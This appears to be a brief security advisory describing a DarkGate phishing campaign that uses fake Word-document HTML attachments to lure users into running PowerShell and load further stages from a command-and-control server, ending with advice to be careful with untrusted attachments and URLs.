Phishing attackers are exploiting social engineering tactics to distribute malicious HTML attachments via email. These attachments, disguised as legitimate Microsoft Word documents, prompt users to execute malicious code by clicking deceptive buttons, initiating a sequence that leads to the download and execution of harmful scripts. The malicious code, typically encoded in Base64, instructs users to either use keyboard shortcuts or manually run PowerShell commands, potentially compromising their systems.
Upon execution, the malicious PowerShell script downloads additional components from a Command and Control server (C2), which further execute PowerShell commands retrieved from the C2. This multi-stage infection process involves the download and execution of HTA files and AutoIt scripts, leveraging obfuscation techniques to evade detection. Traditional signature-based methods may fail to detect the complex infection chain employed by the DarkGate malware, increasing the risk posed to users.
To mitigate the risk of infection, users are advised to exercise caution when handling files from untrusted sources, especially email attachments and URLs. Multiple threats, including phishing emails, malicious scripts, trojans, and potential execution of malicious PowerShell code, have been detected in connection with these phishing campaigns. The presence of suspicious files retrieved from various URLs underscores the importance of vigilance in identifying and avoiding potential phishing or malware attacks.
